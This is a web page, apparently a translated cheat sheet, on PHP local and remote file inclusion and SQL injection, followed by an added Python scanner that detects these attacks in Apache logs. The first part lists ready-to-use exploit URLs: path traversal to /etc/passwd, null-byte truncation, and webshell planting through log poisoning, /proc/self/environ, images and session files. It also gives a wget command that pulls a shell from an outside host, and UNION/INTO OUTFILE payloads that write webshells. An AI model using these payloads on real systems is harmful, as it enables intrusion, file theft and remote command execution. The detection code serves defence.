Summary of file inclusion and injection

Source: Internet
Author: User
Tags: apache log

1. File inclusion

By passing a local or remote file as a parameter (a remote file needs allow_url_fopen enabled; since PHP 5.2 including a URL additionally requires allow_url_include=On), you can read sensitive files, execute commands, and get a webshell.

Type of call: require($file);
Exploit: http://host/?file=/etc/passwd

Type of call: require("pages/".$file);
Exploit: http://host/?file=../../../../../etc/passwd

Type of call: require("pages/".$lang.".php"); require("themes/".$theme."/config.php");
Exploit: http://host/?file=../../../../../etc/passwd%00
(The %00 null byte truncates the appended ".php"; see note 1 below.)

Type of call: require("pages/".$_COOKIE['lang'].".php");
Exploit: javascript:document.cookie="lang=../../../../../etc/passwd%00";

2. Command execution

The payload is <? passthru($_GET[cmd]) ?>. Get it into some file on the server, then include that file through the inclusion bug.

Method 1: insert the code into the Apache log. Request a page that does not exist:
http://host/xxxxxxx=<? passthru(\$_GET[cmd]) ?>
Then include the log with the request pattern from section 1:
http://host/?file=../../../var/apache/error_log&cmd=ls /etc
http://host/?file=../../../var/apache/error_log&cmd=uname -a
If you do not know the Apache path, force an include error: the PHP warning discloses the script's current location. The default Apache log path differs between operating systems. The log can also be located through the file-descriptor table, /proc/{PID}/fd/{FD_ID} (code omitted; proc.pl is one of the Perl helpers in the reference paper):
pepelux:~$ perl proc.pl http://host/index.php
Page: GET  Apache PID: 4191  FD_SIZE: 64  FD: 2
With the PID and FD_ID the include becomes:
http://host/?file=/proc/4191/fd/2&cmd=uname -a
The poisoning request is:
http://host/index.php?x=<? passthru(\$_GET[cmd]) ?>
If that fails, URL-encode (hex-encode) the <? so it reaches the log intact. The code can also be placed in a header field such as User-Agent or Referer, which Apache writes to its logs as well.

Method 2: insert the code through the environment, via /proc/self/environ. /proc/self is a symlink to the PID of the process that opens it. /proc/self/environ is a fixed, known path; it is readable only by the owner of the process, but since /proc/self resolves to the reading process, the PHP process reads its own environment. Put the code in the User-Agent header, submit it, then request:
http://host/?file=../../../proc/self/environ&cmd=uname -a
This mainly works when PHP runs as a CGI (for example via suPHP or mod_cgi), where the CGI variables such as HTTP_USER_AGENT are the real process environment; under mod_php the worker's environ is Apache's startup environment and the header will not be there. I don't really understand this one; normally the permissions should not allow it.

Method 3: insert the code into an image. Append a one-line shell to the image, upload it (for example as an avatar), and include it directly:
http://host/?file=path/avatar.gif&cmd=uname -a

Method 4: insert the code into the session file. This works when a user-supplied value is stored in the session and you know which field:
http://host/?user=<? passthru($_GET[cmd]) ?>
Read the session id from the browser cookie; with file-based sessions the file is usually /tmp/sess_<session id>. Then include it directly.

Method 5: other log files. If FTP is available, log in with the username <? passthru($_GET[cmd]) ?> so that it lands in the FTP log. On old server versions the PUT method can be used to upload the code. Get a shell:
http://host/?file=xxxx&cmd=wget http://devil/shell.txt -O shell.php

3. Injection combined with file inclusion

Method 1: use injection to read key files:
http://host/?id=-1 union select 1,2,3,load_file('/etc/passwd')
If magic_quotes is enabled (quotes get escaped), pass the path as a hex literal instead:
http://host/?id=-1 union select 1,2,3,load_file(0x2f6574632f706173737764)

Method 2: write the output to a file first, then read it back:
http://host/?id=1 into outfile "/tmp/sql.txt"
http://host/?id=-1 union select 1,2,3,load_file('/tmp/sql.txt')

Method 3: write a one-liner directly into the web root:
http://host/?id=-1 union select 1,load_file("/etc/passwd"),1 into outfile "/var/www/host.com/www/passwd"
http://host/?id=-1 union select 1,"<? phpinfo() ?>",1 into outfile "/var/www/host.com/www/phpinfo.php"
If the web directory is not writable, export to /tmp first and include from there:
http://host/?id=-1 union select 1,"<? passthru($_GET[cmd]) ?>",1,1 into outfile "/tmp/sql.txt"
http://host/?file=../../../tmp/sql.txt&cmd=uname -a
load_file() and INTO OUTFILE both require the MySQL FILE privilege and, on current versions, are restricted by secure_file_priv; the file is written by the mysqld user, so the target directory must be writable by that user.

Notes:
1) PHP 5.3.4 and later fixed the %00 (null byte) truncation.
2) Seen some time ago: select * from kj_tab limit 1 into outfile "d:/kj.txt" lines terminated by "<?php eval($living) ?>" (LINES TERMINATED BY appends the string after every exported row, so the column position does not need to be controlled).
3) The reference paper includes several small helper tools written in Perl.
4) For getting a shell from LFI with the help of phpinfo(), see "LFI With PHPInfo Assistance.pdf".
5) 80sec has a similar article on command execution method 2.

Reference: Web vulnerabilities to gain access to the system, http://www.enye-sec.org/en/papers/web_vuln-en.txt
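The detection side of sections 1 to 3, as an added example that is not part of the original page or of the referenced paper: a small Python scanner over Apache combined-format access log lines that flags log poisoning (PHP open tags in the request line, Referer or User-Agent, including percent-encoded ones), local file inclusion attempts (traversal, %00 truncation, and the include targets named in the text such as error_log, /proc/self/environ and session files), and injection used for file read/write, decoding MySQL 0x... literals so the real load_file() path shows up. The log format, the function names and the log lines themselves are assumptions constructed for this example, not real traffic.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format, assumed for this example; adapt for other formats.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=|\s)', re.I)         # <?php, <?=, "<? "
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')                      # ../ or ..\
SQL_FILE_RE = re.compile(r'\bload_file\s*\(|\binto\s+(?:out|dump)file\b', re.I)
HEX_LITERAL_RE = re.compile(r'0x((?:[0-9a-f]{2})+)\b', re.I)
# "/proc/" is last so that "/proc/self/environ" is reported when present.
SENSITIVE_PATHS = ('/proc/self/environ', '/etc/passwd', '/tmp/sess_',
                   '/tmp/sql.txt', 'error_log', 'access_log', '/proc/')


def decode(value):
    """Percent-decode up to twice so %3C%3F and %253C%253F both surface as '<?'."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def decode_hex_literals(text):
    """Recover the strings behind MySQL 0x... literals (the path load_file() really opens)."""
    paths = []
    for m in HEX_LITERAL_RE.finditer(text):
        try:
            paths.append(bytes.fromhex(m.group(1)).decode('utf-8'))
        except UnicodeDecodeError:
            pass  # binary literal, not a path
    return paths


def analyze_line(line):
    """Return {'ip', 'request', 'findings'} for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = {name: decode(m.group(name)) for name in ('request', 'referer', 'ua')}
    request = fields['request']
    findings = []
    # Log poisoning: PHP open tags in anything Apache writes to error_log/access_log.
    for name, text in fields.items():
        if PHP_TAG_RE.search(text):
            findings.append('php-tag-in-' + name)
    # Local file inclusion: traversal, %00 truncation, and well-known include targets.
    if TRAVERSAL_RE.search(request):
        findings.append('path-traversal')
    if '\x00' in request:
        findings.append('null-byte')
    lowered = request.lower()
    for path in SENSITIVE_PATHS:
        if path in lowered:
            findings.append('sensitive-path:' + path)
            break
    # SQL injection used for file read/write, with hex-encoded paths decoded.
    if SQL_FILE_RE.search(request):
        findings.append('sql-file-access')
        findings.extend('hex-path:' + p for p in decode_hex_literals(request))
    return {'ip': m.group('ip'), 'request': request, 'findings': findings}


def scan(lines):
    """Analyze every line and return only the entries that raised a finding."""
    results = (analyze_line(line) for line in lines)
    return [r for r in results if r and r['findings']]


# Constructed sample log lines mirroring the methods in the text (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?file=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # Method 1: poison the log through a non-existent page, then include error_log.
    '10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /xxxxxxx=%3C?%20passthru(%5C$_GET%5Bcmd%5D)%20?%3E HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:56:07 +0000] "GET /?file=../../../var/apache/error_log&cmd=uname%20-a HTTP/1.1" 200 1833 "-" "Mozilla/5.0"',
    # Method 2: code in User-Agent, then include /proc/self/environ.
    '10.0.0.9 - - [10/Oct/2023:13:57:12 +0000] "GET / HTTP/1.1" 200 512 "-" "<? passthru($_GET[cmd]) ?>"',
    '10.0.0.9 - - [10/Oct/2023:13:57:20 +0000] "GET /?file=../../../proc/self/environ&cmd=uname%20-a HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    # Null-byte truncation against require("pages/".$lang.".php").
    '10.0.0.9 - - [10/Oct/2023:13:58:00 +0000] "GET /?lang=../../../../../etc/passwd%00 HTTP/1.1" 200 1400 "-" "Mozilla/5.0"',
    # Section 3: load_file() with a hex-encoded path (magic_quotes bypass).
    '10.0.0.9 - - [10/Oct/2023:13:59:30 +0000] "GET /?id=-1%20union%20select%201,2,3,load_file(0x2f6574632f706173737764) HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['ip'], hit['findings'], hit['request'])
```

Two caveats for running this on real logs: Apache escapes a double quote inside a logged field as \", which the simple [^"]* field pattern does not handle, so such lines return None and need an escape-aware regex; and the sensitive-path list is only the set named on this page, so extend it (php://, /var/log/auth.log, and so on) for production use.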
